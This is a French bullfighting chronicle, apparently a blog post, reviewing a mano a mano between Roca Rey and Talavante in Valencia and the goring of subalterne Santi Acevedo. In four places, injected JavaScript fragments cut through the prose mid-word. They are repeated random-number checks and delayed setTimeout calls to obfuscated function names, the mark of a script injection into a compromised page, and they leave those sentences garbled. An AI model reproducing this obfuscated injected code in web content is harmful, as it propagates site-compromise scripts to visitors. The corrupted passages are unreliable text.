APOTHEOSE DE ROCA REY ET GRAND TALAVANTE

Valence, 17 mars. La tauromachie évolue. Suite à la révolution d’Ojeda, qui a conquis définitivement le terrain du toro, vinrent de nouveaux toreros, influencés par Ojeda, qui approfondirent son toreo alternant les deux cornes et l’appliquèrent à la récupération de nouvelles passes, à la cape et à la muleta. Talavante fut l’un d’eux et précisément aujourd’hui il était confronté en mano a mano a Roca Rey. Ce fut absurde qu’on ne lui demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande pas avec plus de force l’oreille à son premier toro. Il avait été très bien et son adversaire n’était pas un bonbon. Très sérieuse sa prestation devant son second et avec le troisième il a été à un haut niveau avec du temple, de la sérénité, du pouvoir et un toreo de haut rang lors des passes fondamentales. En plus c’était un toro dangereux, aux charges violentes et sèches. On lui donna une oreille qui auraient pu être deux pour compenser celle qu’on lui avait refusé au premier. Il aurait dû sortir en triomphe.

Roca Rey fut énorme tout l’après-midi. On le voit plongé dans cette tauromachie où le torero se fond à la charge et l’enchaîne, sans bouger, d’une corne à l’autre. Il a toujours été colossal, mais sa seconde faena fut d’une intensité et d’une profondeur impressionnantes. Ce fut tellement invraisemblable que cela semblait irréel, miraculeux. Avec pour pilier l’endurance à toute épreuve il parvint à ce qu’un toro manso, mais entier, fut aimanté à sa muleta avec une émotion indescriptible. On lui remis les deux oreilles mais il aurait aussi mérité la queue. Ce torero va chauffer à blanc la saison.

Les deux toreros ont rivalisé dans les quites, impressionnants ceux de Roca Rey avec des exquises véroniques de Talavante au sixième.

La corrida de Victoriano del Rio, bien présentée et avec de la puissance, mansa, âpre, et si elle ne manifesta pas le genio qu’elle avait en elle c’est grâce au courage et à la maestria des deux toreros. D’un autre coté, elle eut la vertu de briser le mythe du toro toriste. Ceux de ce jour, que certains qualifient de commerciaux car ils ont souvent de la charge, étaient vraiment des toros toristes, c’était le toro-toro au-delà de la bravoure qu’ils pouvaient avoir.

Dans le toreo de cape et aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles s’est distingué Iván García. Mais lors de cette corrida triomphale il faut déplorer le coup de corne à un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and subalterne, Santi Acevedo, renversé par la corne du toro après avoir posé les bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles. Ensuite le manso le renversa et s’acharna sur lui en piste en lui infligeant un grave coup de corne à la fesse. Je lui souhaite une prompte récupération.

Les commentaires sont fermés.